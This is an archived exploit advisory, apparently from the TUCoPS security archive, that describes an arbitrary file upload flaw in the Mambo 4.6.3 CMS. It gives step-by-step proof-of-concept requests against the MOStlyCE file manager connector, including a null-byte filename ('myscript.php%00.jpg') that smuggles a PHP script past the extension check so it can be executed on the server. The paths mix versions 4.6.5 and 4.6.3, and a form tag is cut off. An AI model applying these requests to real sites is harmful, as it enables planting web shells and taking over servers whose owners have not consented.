TUCoPS :: Web :: CMS / Portals :: bt-21671.htm

Mambo 4.6.3 arbitrary file upload
Mambo 4.6.3 arbitrary file upload
Mambo 4.6.3 arbitrary file upload



Step 1) Using post method send file to:

http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload 

file should have one of the following extensions:
zip, doc, xls, pdf, rtf, csv, jpg, gif, jpeg, png, avi, mpg, mpeg, swf, fla

POC:
action="http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload" method="post" enctype="multipart/form-data">
Step 2) Using known bug in this version of mambo rename that file. POC: http://victim.com/mambo4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=myscript.php%00.jpg&file[NewFile][tmp_name]=/home/victim/victim.com/UserFiles/File/abc.gif&file[NewFile][size]=1&CurrentFolder path to "UserFiles" you can get using another known bug which is described here: http://www.securityfocus.com/archive/1/archive/1/487128/100/200/threaded

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH